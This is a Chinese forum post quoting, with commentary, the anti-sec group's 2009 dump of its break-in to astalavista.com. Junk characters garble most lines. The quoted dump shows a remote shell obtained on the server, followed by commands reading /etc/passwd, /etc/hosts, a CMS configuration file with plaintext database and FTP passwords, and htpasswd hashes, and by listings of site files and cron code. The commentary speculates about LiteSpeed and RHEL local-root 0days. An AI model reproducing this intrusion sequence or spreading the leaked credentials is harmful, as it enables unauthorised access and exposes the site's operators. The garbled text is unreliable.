里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。. L, ~5 Q3 j( C% @; c
1 r6 F: u2 N5 c4 [+ ]0 q0 G[root@front3 ~]# curl -I litespeedtech.com
3 j# R" H+ P9 t# DHTTP/1.1 200 OK
$ _; d5 Y! J0 K. aDate: Fri, 05 Jun 2009 22:54:51 GMT
# `! E, x8 K) p( |Server: LiteSpeed& v: [. P ^$ O" E% ?3 s& i
9 O$ k( s% `0 y/ b+ t* @7 R3 P
另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-: O! o: W$ e; `5 s: P
" k5 `' g8 X) J4 G7 l' c有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。
A3 Q3 j4 K8 s; s2 N* @$ z9 s. a. M( M# L3 m% t
^* f8 @! T: d1 F1 W/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
9 o0 a1 d# m% ` ^4 Z* T/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \$ X/ c8 ?" }2 E; J% _% ^
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \1 N7 B- A; {" S& s' B
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
8 j) _7 C6 I: K4 L% }+ {3 H/ n \/ \/ \/ \/ \/ \/ \/
& s3 q" G+ r! `4 p The Hacking & Security Community: t Y# M2 W1 i- Y$ T) z, |/ c8 d! G
[+] Founded in 1997 by a hacker computer enthusiast
- m: \7 B; I/ y! a[-] Exposed in 2009 by anti-sec group F' l) |& s" a% g+ b
2 ?2 z2 ^2 u5 x( N
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:
3 |) d3 S2 i& p3 @- O. ?: b>> 03. Who’s behind the site?
0 a2 Z& N% X# Y>>9 H2 p* _2 Q/ j5 H
>> A team of security and IT professionals, and a countless number of contributors from all over the world.
7 u0 O/ M4 n3 `+ J7 y9 m( g7 G* H" U4 s! J1 Z+ q
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?2 }1 S7 N0 X: j5 D i
>>3 j$ [/ W& s* A1 A( m
>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and/ W. k: x$ R Z; M- G* _) h, m
military institutions.6 d8 z) D/ P# B( F1 S% L
>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
% Y5 y* u/ G' F; P2 z% R4 t0 r6 ~. u" U7 Y
Why has Astalavista been targeted?; k; W: H( x k1 t/ I# X6 y
) e% }- X( r1 H2 k; FOther than the fact that they are not doing any of this for the “community” but7 x1 l+ X# y1 J" K: y/ C! P
for the money, they spread exploits for kids, claim to be a security community4 e4 L6 t6 [$ }2 V% R
(with no real sense of security on their own servers), and they charge you $6.66
4 F+ I) w3 a$ h( Iper months to access a dead forum with a directory filled with public releases9 M2 u' Z# i6 D. p* U0 G, H( M
and outdated / broken services.
8 Z5 e- t* X9 m
5 @ G! S8 {" a! @! BWe wanted to see how good that “team of security and IT professionals” really is.$ e8 s. L5 l6 [ I D' E
& Z2 i+ d: f5 W- ^Let’s begin.
5 B% c( q, Z. H% h3 ~$ F5 p9 d- f4 j: ]' F+ C* P) U- ^/ {
anti-sec:~# ./g0tshell astalavista.com -p 80: p9 e) K* P m, @$ A' ^
[+] Connecting to astalavista.com:80
% Z3 k) y8 s+ A0 A+ Y[+] Grabbing banner…- ~5 K( |9 m+ n* i3 s! }" j. F; k, Z
LiteSpeed
# c9 N3 ~: j0 T7 m( B[+] Injecting shellcode…5 u+ w1 D4 E4 K' ?2 V
[-] Wait for it
. i( u$ s1 L( N& g! Y8 K6 b
/ p- y" P+ {8 Q[~] We g0tshell* u1 b' B" W8 ?" ?
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
: \' ]" b" h9 W# z8 H3 n OID: uid=100(apache) gid=500(apache) groups=500(apache)2 }0 v' d9 F% }: E8 s) A; U
9 c( q' [( B/ B5 K1 D5 ?" Jsh-3.2$ cat /etc/passwd
8 \' n; ? x7 S8 Lroot:x:0:0:root:/root:/bin/bash
. s* k3 g7 @' d5 [5 p7 r4 a! Lbin:x:1:1:bin:/bin:/sbin/nologin# I0 g! n& b4 K! C# n7 U. }
daemon:x:2:2:daemon:/sbin:/sbin/nologin
5 I; y9 A; L3 E( e- }5 i5 Cadm:x:3:4:adm:/var/adm:/sbin/nologin5 E8 H6 W9 ^" V# R5 E. \0 m9 ^3 N
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin- T8 Y# k o. v5 J/ b
sync:x:5:0:sync:/sbin:/bin/sync
7 C) Z$ K C1 `- t3 A$ Tshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
5 n' i# t, H. }+ W9 ^0 H6 yhalt:x:7:0:halt:/sbin:/sbin/halt
" A1 n; \& j0 \5 I6 jmail:x:8:12:mail:/var/spool/mail:/sbin/nologin5 p/ _0 q" s- P# i! h# `- m
news:x:9:13:news:/etc/news:
# t8 r6 ^3 K2 o7 j$ B2 zuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin8 S. t# r" G- ^- t3 ]
operator:x:11:0 perator:/root:/sbin/nologin6 B. f: s. t$ M, t( l ` n
games:x:12:100:games:/usr/games:/sbin/nologin( r* ? G0 |" Q& i
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin$ A2 K6 t. g' K
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin& p* J1 T7 |6 `0 Z: ^% {! `
nobody:x:99:99:Nobody:/:/sbin/nologin
" k+ F0 S# v6 K6 {9 g/ d4 }rpm:x:37:37::/var/lib/rpm:/sbin/nologin4 y1 f2 H, y- ~4 @8 i$ U2 O
dbus:x:81:81:System message bus:/:/sbin/nologin
# m9 x; ], l1 z' H2 j9 Q2 Z y5 _nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
- E3 A' D( Z: ?mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
- y, `* r* @" ?- msmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
% l0 O9 ]* I6 e; `2 r" ]vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin6 q0 B: J! v6 o% q3 }
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
8 u/ I9 Z. M ]2 J0 s3 @# Yrpc:x:32:32 ortmapper RPC user:/:/sbin/nologin9 V9 d l7 a1 s; {. m7 G
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
; }" s! g/ [& T2 i" Lnfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
; ]: ?# h: n: ] {3 tsshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin' S/ R* ?+ D3 t' o3 Y4 l8 n
pcap:x:77:77::/var/arpwatch:/sbin/nologin9 [( ~ L% G- {+ x
named:x:25:25:Named:/var/named:/sbin/nologin+ B& R3 k Q* o! c- V$ t# Q
apache:x:100:500::/var/www:/bin/false
3 X9 h. f$ b4 G, j9 cdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
. s8 b8 C# y8 k& O: {mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash
- x/ `4 x9 e/ p8 b& K( {6 _4 ~webapps:x:500:501::/var/www/html:/bin/bash) \9 h# v. C1 B3 _
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash3 ?8 C3 |- N4 T5 F2 E% e( U
admin:x:501:502::/home/admin:/bin/bash/ u, X) M \, |$ t/ A" A* O' W1 g
jon:x:502:503::/home/jon:/bin/bash
& ^. d& R, e( s e6 l. Ecom:x:503:504::/home/com:/bin/bash
y- x% b* o7 c& ]9 kntp:x:38:38::/etc/ntp:/sbin/nologin1 Z! k8 F: b) \/ n/ m6 ~! Y0 f1 X
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
}/ Q+ `/ l) r3 i. qastanet:x:504:505::/home/astanet:/bin/bash1 z; {, d9 B; H1 \( z& c$ }4 B
avahi:x:70:70:Avahi daemon:/:/sbin/nologin9 c! w2 N; i3 u$ g5 \
avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
/ q( F2 {6 j8 |0 a1 q6 |% G8 E7 ^, z% l' m( X. j0 g
sh-3.2$ cat /etc/hosts
! j% H+ d: Y7 I& K; ~# Do not remove the following line, or various programs
( y9 E$ b% R I6 X0 Q# that require network functionality will fail.
. ~9 r; q- T+ c k127.0.0.1 localhost.localdomain localhost$ f3 r( {* u& q4 |
::1 localhost6.localdomain6 localhost6. m! F6 G0 m# v1 g, M* Z& E2 f3 D
80.74.154.172 asta1.astalavistaserver.com
$ H2 p. `' q4 Y$ ^2 u' ?( E% ~; Y! }9 X2 |+ w
sh-3.2$ pwd1 `; ?# E6 n& F2 f
/home/com/public_html( A* ^8 {) S2 O4 w! }9 d! S
8 Y) i# M3 `* h4 J
sh-3.2$ ls -la1 P: S. A: U/ w4 p* _ V$ s
total 18460
% v. V* i# ?8 P- s3 o3 H+ Sdrwxr-xr-x 30 com apache 4096 May 28 17:06 .0 _5 s( g% Q1 q- a! G
drwx–x–x 11 com com 4096 Jun 25 2008 ..
- _6 u9 s0 ]* V1 {# \: Tdrwxr-xr-x 2 com com 4096 Feb 2 19:29 admin, j7 `+ C& Y( G ?$ p. m) d
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache- @, N* W3 ^+ E+ @3 f+ Q* C3 b" A
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin! f' ?; O \' s+ P: B/ U/ }) E
drwxrwxrwx 2 com com 4096 May 19 00:50 config
6 y$ H, g6 ?9 q3 G5 r; idrwxr-xr-x 2 com com 4096 Mar 20 11:05 core1 l1 ?5 ^" A' I5 f9 ]* h/ n/ J
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
( J. N: G0 `: _5 d" d" }1 Rdrwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing8 a5 s9 S( ?/ d+ [
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo+ ^. O7 n" Q# F( M" ^
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__5 _7 ~: A6 D, l
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php8 ], G5 Y6 c- _, P
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd4 e- N1 C0 x! C$ G
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor9 P6 Z9 M3 B: i: H; H# H1 d
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico3 w9 `% T2 l6 h9 e8 R
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
W8 v) k6 G, d" w8 Q9 O4 E-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
) W/ u3 Y; M% e F. ?-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
8 V3 e. w, q7 S-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak ?4 R5 b# h0 K' k1 F. h
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
. K( @% A8 S" `' g x+ O+ i9 w6 ^drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
' H, u0 Z' F+ \! N/ e-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
9 B' k3 i. M: g1 T& f& cdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer u; @; w3 _6 @/ z( {5 }
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
. C) i. Z' f8 X, c: | L5 r6 O6 wdrwxr-xr-x 22 com com 4096 Feb 2 19:29 lib
; ]; d0 ~( A6 z* [2 a8 Jdrwxrwxrwx 12 com com 4096 Jun 2 07:47 media
- f& X9 `# W( R- x% b$ f5 Y5 O; ydrwxr-xr-x 8 com com 4096 May 11 12:48 modifications
! |9 H+ d! M" K; p7 Bdrwxr-xr-x 34 com com 4096 May 28 16:30 modules
2 h! y ~6 l$ Z" l# ydrwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin$ e7 c4 E; C4 R5 g/ R$ u+ y- o: F
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
; w6 m1 Z0 J9 Hdrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old1 u% E' ~4 `) G$ y! e' C, b
drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
; _: M$ O8 @8 q# i6 L- b3 Jdrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy
4 S, U. e8 ~3 c# ~' q9 E1 K( M-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt7 [3 c' K1 G- k! J0 F% X7 ~
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
/ x" A0 O |8 y! U$ ]) M-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
+ U w( C+ N3 a, }5 N3 wdrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
4 Q& {7 Z0 l, I: w' Cdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp( ?/ f4 Y. J1 p( I6 S( Z
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam9 i9 u4 n' K- `
- x8 b) @* f# X/ S. psh-3.2$ head -20 index.php) K$ m4 _) {0 S2 h
<?php
: X! `5 Y1 k% F0 D/ s6 [- M
6 q' Q7 S0 Z+ M$ ]7 v! p. h' C, A0 _/**# k# k: R3 n1 u5 E
* The main page for the CMS. t- `6 K1 p) E0 {3 ] s5 Z; u6 @+ a
* @copyright CONTREXX CMS - COMVATION AG$ C+ m, R" u% ^
* @author Comvation Development Team$ d+ e/ |9 ?. r0 U+ G; h0 s
* @version v1.0.9.10.1 stable
3 P8 z' _1 f& P* @package contrexx
/ {- r. ~' {5 U2 K5 P* @subpackage core0 A' w! ?6 D# V0 H* L+ w* o4 {
* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
8 R4 t( I6 v7 q# P$ F, s$ S* @since v0.0.0.05 b* e+ B3 h" ^" V
* @todo Capitalize all class names in project; m. k3 b3 H- ?" D2 y
* @uses /config/configuration.php6 i6 W/ B/ K3 z7 a2 c
* @uses /config/settings.php
5 C) s% C' c/ A* @uses /config/version.php- m+ ?+ y! T' {8 Z5 l$ U
* @uses /core/API.php
* Y2 [/ {1 l* F9 \; z. q1 z* @uses /core_modules/cache/index.class.php
+ |' K1 e' Y% I( j* @uses /core/error.class.php
9 {6 \! A7 K& r8 s, y) ?0 o* @uses /core_modules/banner/index.class.php
. i' E% A/ P$ j& {* F* @uses /core_modules/contact/index.class.php% |, A& k% y3 s8 L
. d _$ A# K# ~) z; esh-3.2$ cd config/' A* S( j, s8 I3 E: y7 e0 j
sh-3.2$ ls -la% B; _5 M2 Z% F
total 329 w0 z! d2 j) E" j# R; R0 O2 J
drwxrwxrwx 2 com com 4096 May 19 00:50 .# R! E/ c2 X# D: b
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
$ w1 A, T# R4 Z( E m3 X1 J-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php
# M. I# {/ u+ Z-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
+ U' a( Z9 u% ^/ ]% N _* w( R-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php
" S5 k* p6 V6 H# U* p- Q/ D* p-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php3 y$ @! }+ g! o4 a# ~) f) `0 w
% }, O0 f' i7 w4 `, T: Rsh-3.2$ cat configuration.php
, u4 l5 p& t Z8 S) B[snip]
& d( q. H5 S8 ?: U1 K: W$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost
/ q9 B# ~7 J# m! J( ~* ^" d6 J$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name1 w% w! ^# y9 \# U
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix# B( c+ m' l& m+ r( A' h& } A
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
6 ?! F8 K' O6 \/ F8 y6 L$ K$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
0 s: ~% {1 m3 b$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)" \' l" [8 K z' P
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..). b R' r. n* L& F9 V N
[snip]: v- }8 E8 N g6 o$ j& _
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
$ k2 g2 M0 f5 F: O+ d7 _* _1 X$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
/ g2 u. N, V9 Y4 u$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
" x" P0 x) I% W, @( M4 O- h$_FTPCONFIG['port'] = 21; // Ftp remote port% E* l* f& _5 Y- c
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username7 H- w u" s* g: U7 f
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password
" N5 C8 L4 l5 t, s: q$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
: w8 ]0 `) c7 E2 m) n' @2 O4 s( l/ c; t2 L! ]2 e7 Q. q
sh-3.2$ cd ..8 k4 N. F* a+ [, v# x6 Z$ [
sh-3.2$ cd dvd/' h3 I% W6 {2 S( m, S q% @3 o
sh-3.2$ ls -la
@% K$ x1 P2 ]4 f) ~- o/ Stotal 2913780
. }0 A9 f8 H; Gdrwxr-xr-x 2 com com 4096 Sep 9 2008 .! A" k" b* t/ O5 w8 J: Z( @
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
# E4 E' g3 J5 N& X-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar
* U7 @+ u' f: I+ O$ S-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar0 I) t& j& T7 p6 H+ s3 a/ k
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
9 W9 z1 O% e* o1 |$ T, A3 V! t- H-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess8 R7 Q, n! U6 k$ m" ?1 H
6 ~0 E: ]0 j% V6 Qsh-3.2$ cat .htaccess4 x2 J& R4 X& w, U6 z
authType Basic
, Z& I1 x9 g. `0 m) L& O# QauthName DVD
; X; T: K) m( NauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
; n0 O% e) t# Z3 |9 k( W/ v# Grequire valid-user" L; v$ D, \1 P6 e
# q% E& I) [ h1 z$ H
sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
6 S& f) x6 c. zDVDdownload:CRD8cuY6.MPT6. @& p, @# d- s5 w$ x3 D+ i
DVDdownload2:CR8a36.wluFMg+ d. z6 E: _8 |9 c- X- i; Z
! s( U( z0 Y1 u" A& o E
sh-3.2$ cat test.php' v# t7 L! J% z2 E7 w& {8 a
<?php
. r) W- A U7 E; l U/ R G# Y4 B+ @$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
& b3 A2 j" O+ }1 k* C" L% L j$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
+ }. `; q0 n+ Aecho $url;4 [# @" ~2 ~! b6 ]5 l8 d
?>; y* a, x* B; L; Q8 o% o/ X
( V4 v- v5 d3 tsh-3.2$ cd modifications/
% U8 r: h, T4 A( \, S* Hsh-3.2$ ls -la
! t2 U7 Q! [7 @8 Wtotal 32* m7 `" L9 e( x, Z8 ]1 [* C
drwxr-xr-x 8 com com 4096 May 11 12:48 .
7 s2 b/ ?. q9 O: V0 w0 P" K; O; Rdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
4 ~9 {( y0 {- j C! t# P4 Y" X; sdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
% ?( X' T5 g) [/ K% C( @# @ pdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs" |; Q0 b! k$ i' d
drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools4 D6 f% j3 p( z8 E4 M: {/ L5 P, Z: g( }
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc+ t& a0 p- K- [. |% S0 N- R
drwxr-xr-x 2 com com 4096 Feb 2 19:33 search
: i1 y; H' z- @- c7 bdrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
- E& i5 C. S$ u7 l. ^( P* U/ o2 E+ }) S) k: H: _
sh-3.2$ ls -R9 _" W% S: L' n, C
.:
/ o" I, q* n A" Ccom_avtng cronjobs onlinetools pjirc search _tmp
: j1 k! c+ l! q" |- J; h: X0 l" Q4 r. W, ^
./com_avtng:8 d, o% ?: R: E
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
( I2 @. {4 c9 e0 ?- v; n5 h7 M2 }+ u; }% {7 G1 W/ s2 {
./com_avtng/scripts:5 L8 H" \) t$ |0 Q" `4 _7 {
popunder.js8 T: ~& \9 U9 _8 ^( Z1 ]! Y, v
. i \3 y+ ]) c2 J+ P& q6 E# Q
./cronjobs:* ]1 H( V# ]$ L
exploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
7 ]0 w% g* G8 H. G K3 C+ u
9 a" s: {( ~& L& U1 r6 Y( h6 f( B2 O./cronjobs/tmp:
' |; N( J4 G3 E% Y/ ^. {) ^! t, _contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv) R' l# G7 g- i9 c# y/ o6 j! y
# ]+ f( z5 I" {
./onlinetools:( n5 q3 `( _& Z, ]1 T
index.php$ k I* p B7 r9 Y
r* R4 U* j: q4 f& V5 H- `; o3 u% H6 j- U
./pjirc:/ w7 e& B* {7 D- k9 Z
a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt4 y- L5 j$ Y7 H. M7 Y
AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
" E. F9 A- R, qbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd, S* g, {1 G6 L+ Q6 _
; D8 E" M8 j/ T3 j, {2 r./pjirc/img:
7 S D, k4 K, z! `' ^/ ?, r4 Fange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif9 j* [8 O; C' N3 H0 o; q
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
: D* X+ c1 e; r* b+ w7 Kverre-eau.gif+ S. y, Y- d3 G4 E/ u5 f+ v0 _
argh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
3 r% a" L0 I% ~! J* A( _( }verre-vin.gif+ x4 w9 @$ ?! R u$ I
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif
1 t3 }9 q6 N2 g9 ^& f Y! g! ibiere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif
) ^1 i3 S0 w2 L+ ?$ j
9 S- H5 C2 n, e" B./pjirc/snd:
1 B& W3 B p0 J( Xbell2.au ding.au
: U# r+ p9 ]# M+ |# G& m/ A) |: _5 g% Q/ K/ }6 D6 ]$ _
./search:
) O! q( X* W. G( _4 a+ csearchEngines.php search.php
0 ]5 R' [; |1 Q2 ? V! n2 U& @% f. \, i* v4 z! w# Y
./_tmp:
" T1 t6 I0 i" T) i9 E1 X _defaultPorts.php defaultPorts.txt
3 X9 U( Q0 U) J6 c
/ s4 H* j) `7 x; Bsh-3.2$ cd cronjobs/3 o: ^: d! @+ N1 q7 {7 [7 A1 Z8 c( ~
sh-3.2$ cat exploits.php
, V# n4 @0 f3 A3 _# V2 a" L[snip]% r$ @4 u$ n E
$categories = array();
3 Z9 g' n* Z9 t7 \7 c$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;$ Z6 d9 p+ E# T5 q& v
$expolits = file($milw0rmFile);2 f% y% R2 ~2 I) m9 L( e
$comExploits = array();/ @1 t* U( W; ~7 y3 h
[snip] P! ]6 T, u! c0 ~ h
// manage data# E; g& {4 j9 l
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640
9 h2 U+ U. _6 w: u
. p, o! W# s2 `3 I/ V // get path and title7 E6 V! K* q% I5 j- i/ q) @5 c
$expolits[$x] = trim($expolits[$x]);
( ^$ a4 I: v- N2 J* y# y" f, O6 M+ Q $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
3 E! w% Z; S1 m- }4 [4 \ $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);7 H5 L; i$ v3 [$ y! U( N8 ]% R
2 k- u; |9 l k. L- f. ~( M9 |& {
// check if file exists
- k% [8 I" n+ w$ M, [ if (file_exists($path)) {
& i- y [ {0 x( C
6 [- J; @5 ?. m- _1 t4 ] $text = file_get_contents($path);% D# k* M4 X4 Q$ t, w' Q w
# I, D' g+ B" j* m# E // get content and date4 x% L+ v& G9 V1 Q
//$text = htmlspecialchars($text, ENT_QUOTES);+ {6 w) n6 P" I% q
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));; t3 Z6 f+ {. t
if ($tmptext != ”) {
" u6 E- X" J1 X: W $text = $tmptext;; E5 N7 s. E) \1 q+ j# t' f; h! Q
} else {6 `5 p/ |4 S/ k+ A# b8 j- B
$text = addslashes(htmlentities($text, ENT_QUOTES));
! G7 Z0 t3 ~* [9 b }
. k6 P) f( U: @; q @ $date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));% A: r8 [% }) p" D" v* k
$tmp = explode('-', $date);# r2 C7 y$ X8 \8 K. Q/ v. ]
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));& i! S; P9 I0 t" h+ ~
$cat = getCategory ($path); {$ b5 \8 n3 T: \
$ext = pathinfo(basename($path));
. c% ~3 e; V% L7 s: E. h: n' ] $ext = $ext['extension'];, Y. x, w! y8 m H
$qStr = ”5 P1 r1 Z3 U7 f7 N: H- [+ g
SELECT `id`2 S/ R& R6 U# E
FROM `contrexx_module_exploits`; ~& T" @2 d0 G$ j( l3 d
WHERE `title` = ‘” . $title . “‘, e( k b( K! Y8 f+ M( k0 a
AND `date` = ‘” . $date . “‘
6 E7 _8 u: ]" a1 S/ W “;/ J( y* t5 x; g6 b: @6 J, A$ z
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
- ^) I3 D* J* ]9 r $q = $_objDB->query($qStr);
( j }! N' C0 c2 ~$ L6 h) w6 S$ ^& J _. o5 R+ \2 ~
if ($q->numRows() == 0) {
, r2 [# R; Y; F2 U
6 D. A! B* {* B& W // prepare array U" I/ a: j l1 o. d$ T
$comExploits[$x]['date'] = $date;0 |# S% ^# \8 A x8 Z, A
$comExploits[$x]['title'] = $title;: R' @3 k' _( Y& [/ d1 `
$comExploits[$x]['author'] = ‘milw0rm’;$ k/ V4 L, V. Q: s# x
$comExploits[$x]['text'] = $text;
/ ]1 Y) [5 k# d) @/ w $comExploits[$x]['source'] = $ext;. i" e3 l& J# |* d ^2 I
$comExploits[$x]['url1'] = ”;: C5 T+ b/ N K3 @: x/ e& V& u
$comExploits[$x]['url2'] = ”;5 N3 F: f* k* }+ E, C# E4 E y
$comExploits[$x]['catid'] = $cat;
" O- G; s# V& N n/ I: N8 |6 \ $comExploits[$x]['lang'] = ‘2′;
) h0 `$ s! w( K" g2 I M9 }1 D $comExploits[$x]['userid'] = ‘12′;
& ^5 n4 u1 j+ |: n4 ` $comExploits[$x]['startdate'] = ‘0000-00-00′;
4 U2 z2 g9 D9 h. r0 B9 Y $comExploits[$x]['enddate'] = ‘0000-00-00′;
) ~% J. g" d5 I! m% }% n $comExploits[$x]['status'] = ‘1′;
% P! e& p! K$ G) X $comExploits[$x]['changelog'] = $date;8 _1 E! B. Y. l% L7 p2 i# ]! i5 S
* [( P. V- j7 y8 p$ i$ A }
& w: }0 [* G$ d& m) r5 D[snip], V7 Y- ]# T( C- R8 _. r2 C; W
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>7 g, c# k- a/ g- r3 ]
